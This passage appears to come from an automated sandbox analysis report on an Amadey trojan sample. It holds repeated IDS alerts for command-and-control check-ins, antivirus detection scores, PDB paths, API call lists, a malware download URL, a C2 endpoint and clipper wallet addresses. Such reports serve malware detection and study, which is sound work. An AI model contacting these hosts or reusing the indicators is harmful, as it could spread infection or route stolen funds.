                              Source Port:49843
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450263802027700 02/06/23-18:38:22.311708
                              SID:2027700
                              Source Port:50263
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450248802027700 02/06/23-18:38:18.734487
                              SID:2027700
                              Source Port:50248
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450284802027700 02/06/23-18:38:29.098650
                              SID:2027700
                              Source Port:50284
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449871802027700 02/06/23-18:36:35.146966
                              SID:2027700
                              Source Port:49871
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450027802027700 02/06/23-18:37:21.251923
                              SID:2027700
                              Source Port:50027
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449757802027700 02/06/23-18:36:05.614238
                              SID:2027700
                              Source Port:49757
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449876802027700 02/06/23-18:36:37.001689
                              SID:2027700
                              Source Port:49876
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450198802027700 02/06/23-18:38:05.080347
                              SID:2027700
                              Source Port:50198
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449873802027700 02/06/23-18:36:36.003660
                              SID:2027700
                              Source Port:49873
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450024802027700 02/06/23-18:37:20.506098
                              SID:2027700
                              Source Port:50024
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450205802027700 02/06/23-18:38:07.442403
                              SID:2027700
                              Source Port:50205
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449948802027700 02/06/23-18:36:59.384504
                              SID:2027700
                              Source Port:49948
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450057802027700 02/06/23-18:37:28.262420
                              SID:2027700
                              Source Port:50057
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449729802027700 02/06/23-18:35:57.348763
                              SID:2027700
                              Source Port:49729
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449907802027700 02/06/23-18:36:47.522865
                              SID:2027700
                              Source Port:49907
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450098802027700 02/06/23-18:37:39.529541
                              SID:2027700
                              Source Port:50098
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450235802027700 02/06/23-18:38:15.569378
                              SID:2027700
                              Source Port:50235
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449830802027700 02/06/23-18:36:24.829107
                              SID:2027700
                              Source Port:49830
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449989802027700 02/06/23-18:37:09.476584
                              SID:2027700
                              Source Port:49989
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450016802027700 02/06/23-18:37:18.532774
                              SID:2027700
                              Source Port:50016
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450207802027700 02/06/23-18:38:08.630704
                              SID:2027700
                              Source Port:50207
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450276802027700 02/06/23-18:38:26.300126
                              SID:2027700
                              Source Port:50276
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449848802027700 02/06/23-18:36:28.944538
                              SID:2027700
                              Source Port:49848
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450230802027700 02/06/23-18:38:14.375521
                              SID:2027700
                              Source Port:50230
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450271802027700 02/06/23-18:38:24.266112
                              SID:2027700
                              Source Port:50271
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450100802027700 02/06/23-18:37:39.998889
                              SID:2027700
                              Source Port:50100
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449807802027700 02/06/23-18:36:19.287197
                              SID:2027700
                              Source Port:49807
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449978802027700 02/06/23-18:37:06.699430
                              SID:2027700
                              Source Port:49978
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450093802027700 02/06/23-18:37:38.357594
                              SID:2027700
                              Source Port:50093
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450129802027700 02/06/23-18:37:46.992346
                              SID:2027700
                              Source Port:50129
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449730802027700 02/06/23-18:35:58.016249
                              SID:2027700
                              Source Port:49730
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450052802027700 02/06/23-18:37:27.283164
                              SID:2027700
                              Source Port:50052
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450307802027700 02/06/23-18:38:34.659310
                              SID:2027700
                              Source Port:50307
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450348802027700 02/06/23-18:38:46.302644
                              SID:2027700
                              Source Port:50348
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449866802027700 02/06/23-18:36:33.225481
                              SID:2027700
                              Source Port:49866
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450139802027700 02/06/23-18:37:50.922595
                              SID:2027700
                              Source Port:50139
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449860802027700 02/06/23-18:36:31.786991
                              SID:2027700
                              Source Port:49860
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449777802027700 02/06/23-18:36:10.512879
                              SID:2027700
                              Source Port:49777
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450228802027700 02/06/23-18:38:13.886569
                              SID:2027700
                              Source Port:50228
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449955802027700 02/06/23-18:37:01.055369
                              SID:2027700
                              Source Port:49955
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450090802027700 02/06/23-18:37:37.652979
                              SID:2027700
                              Source Port:50090
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449973802027700 02/06/23-18:37:05.465390
                              SID:2027700
                              Source Port:49973
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450240802027700 02/06/23-18:38:16.797444
                              SID:2027700
                              Source Port:50240
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450311802027700 02/06/23-18:38:35.648201
                              SID:2027700
                              Source Port:50311
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449884802027700 02/06/23-18:36:38.947006
                              SID:2027700
                              Source Port:49884
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450044802027700 02/06/23-18:37:25.381632
                              SID:2027700
                              Source Port:50044
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450222802027700 02/06/23-18:38:12.425383
                              SID:2027700
                              Source Port:50222
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450133802027700 02/06/23-18:37:48.134151
                              SID:2027700
                              Source Port:50133
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449795802027700 02/06/23-18:36:14.536822
                              SID:2027700
                              Source Port:49795
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449838802027700 02/06/23-18:36:26.789629
                              SID:2027700
                              Source Port:49838
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450151802027700 02/06/23-18:37:53.780649
                              SID:2027700
                              Source Port:50151
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449927802027700 02/06/23-18:36:52.819701
                              SID:2027700
                              Source Port:49927
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450062802027700 02/06/23-18:37:29.485225
                              SID:2027700
                              Source Port:50062
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450317802027700 02/06/23-18:38:37.080325
                              SID:2027700
                              Source Port:50317
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449726802027700 02/06/23-18:35:56.260662
                              SID:2027700
                              Source Port:49726
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449850802027700 02/06/23-18:36:29.439544
                              SID:2027700
                              Source Port:49850
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450279802027700 02/06/23-18:38:27.884547
                              SID:2027700
                              Source Port:50279
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449945802027700 02/06/23-18:36:58.654499
                              SID:2027700
                              Source Port:49945
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450149802027700 02/06/23-18:37:53.313477
                              SID:2027700
                              Source Port:50149
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450345802027700 02/06/23-18:38:44.689333
                              SID:2027700
                              Source Port:50345
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450238802027700 02/06/23-18:38:16.299287
                              SID:2027700
                              Source Port:50238
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449767802027700 02/06/23-18:36:08.035707
                              SID:2027700
                              Source Port:49767
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449749802027700 02/06/23-18:36:03.660431
                              SID:2027700
                              Source Port:49749
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449904802027700 02/06/23-18:36:43.781750
                              SID:2027700
                              Source Port:49904
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449815802027700 02/06/23-18:36:21.210734
                              SID:2027700
                              Source Port:49815
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450327802027700 02/06/23-18:38:39.273408
                              SID:2027700
                              Source Port:50327
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450250802027700 02/06/23-18:38:19.214721
                              SID:2027700
                              Source Port:50250
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450291802027700 02/06/23-18:38:30.738198
                              SID:2027700
                              Source Port:50291
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449856802027700 02/06/23-18:36:30.850298
                              SID:2027700
                              Source Port:49856
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450161802027700 02/06/23-18:37:56.171482
                              SID:2027700
                              Source Port:50161
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450072802027700 02/06/23-18:37:33.278393
                              SID:2027700
                              Source Port:50072
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450297802027700 02/06/23-18:38:32.224802
                              SID:2027700
                              Source Port:50297
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449822802027700 02/06/23-18:36:22.933332
                              SID:2027700
                              Source Port:49822
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450167802027700 02/06/23-18:37:57.576211
                              SID:2027700
                              Source Port:50167
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450256802027700 02/06/23-18:38:20.656895
                              SID:2027700
                              Source Port:50256
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449911802027700 02/06/23-18:36:48.462366
                              SID:2027700
                              Source Port:49911
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450078802027700 02/06/23-18:37:34.718345
                              SID:2027700
                              Source Port:50078
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450266802027700 02/06/23-18:38:23.033535
                              SID:2027700
                              Source Port:50266
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected


                              AV Detection

                              Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | Avira URL Cloud: Label: malware
                              Source: file.exe | ReversingLabs: Detection: 69%
                              Source: file.exe | Virustotal: Detection: 51%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll | ReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | ReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe | ReversingLabs: Detection: 48%
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | ReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe | ReversingLabs: Detection: 28%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | ReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | ReversingLabs: Detection: 80%
                              Source: file.exe | Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe | Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe | Joe Sandbox ML: detected
                              Source: 28.0.mnolyk.exe.70000.0.unpack | Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                              Source: 27.2.rundll32.exe.6fb90000.0.unpack | Malware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A32F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00A32F1D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe | Code function: 1_2_00F82F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00F82F1D

                              Compliance

                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe | Unpacked PE file: 2.2.arJf.exe.400000.0.unpack
                              Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                              Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: Binary string: wextract.pdb source: file.exe, brJg.exe.0.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.249730772.00000000049A9000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000E.00000000.394369817.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000F.00000000.395468637.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000000F.00000002.775153494.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001A.00000002.404223477.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001A.00000000.402551757.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001C.00000002.412679871.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001C.00000000.412460311.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000002.539131975.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000000.538897999.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000021.00000002.667838204.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000021.00000000.667524301.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe.14.dr, xriv.exe.0.dr
                              Source: Binary string: Healer.pdb source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368573953.0000000002180000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: wextract.pdbGCTL source: file.exe, brJg.exe.0.dr
                              Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: brJg.exe, 00000001.00000003.252066347.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, brJg.exe, 00000001.00000003.251774112.0000000004E86000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 0000000D.00000000.369407465.0000000000142000.00000002.00000001.01000000.00000009.sdmp, nika.exe.1.dr
                              Source: Binary string: _.pdb source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: KC:\jovoxomexep_yuyobib\topaduseyese.pdb source: arJf.exe, 00000002.00000000.252149587.0000000000401000.00000020.00000001.01000000.00000005.sdmp, arJf.exe.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001B.00000002.775394755.000000006FB9F000.00000002.00000001.01000000.0000000D.sdmp, clip64[1].dll.15.dr, clip64.dll.15.dr
                              Source: Binary string: Healer.pdbH5 source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368573953.0000000002180000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: *C:\jovoxomexep_yuyobib\topaduseyese.pdb source: brJg.exe, 00000001.00000003.251774112.0000000004E51000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\jovoxomexep_yuyobib\topaduseyese.pdb source: brJg.exe, 00000001.00000003.251774112.0000000004E51000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000000.252149587.0000000000401000.00000020.00000001.01000000.00000005.sdmp, arJf.exe.1.dr
                              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\
                              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\
                              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\
                              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\
                              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A32390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A32390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe | Code function: 1_2_00F82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F82390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | Code function: 14_2_010BFC58 FindFirstFileExW,14_2_010BFC58

                              Networking

                              Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49725 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49824 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49825 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49826 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49827 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49828 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49829 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49830 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49831 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49832 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49833 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49834 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49835 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49836 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49837 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49838 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49839 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49840 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49841 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49842 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49843 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49844 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49846 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49847 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49848 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49849 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49850 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49851 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49852 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49853 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49854 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49855 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49856 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49857 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49858 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49859 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49860 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49861 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49862 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49863 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49864 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49865 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49866 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49867 -> 62.204.41.4:80
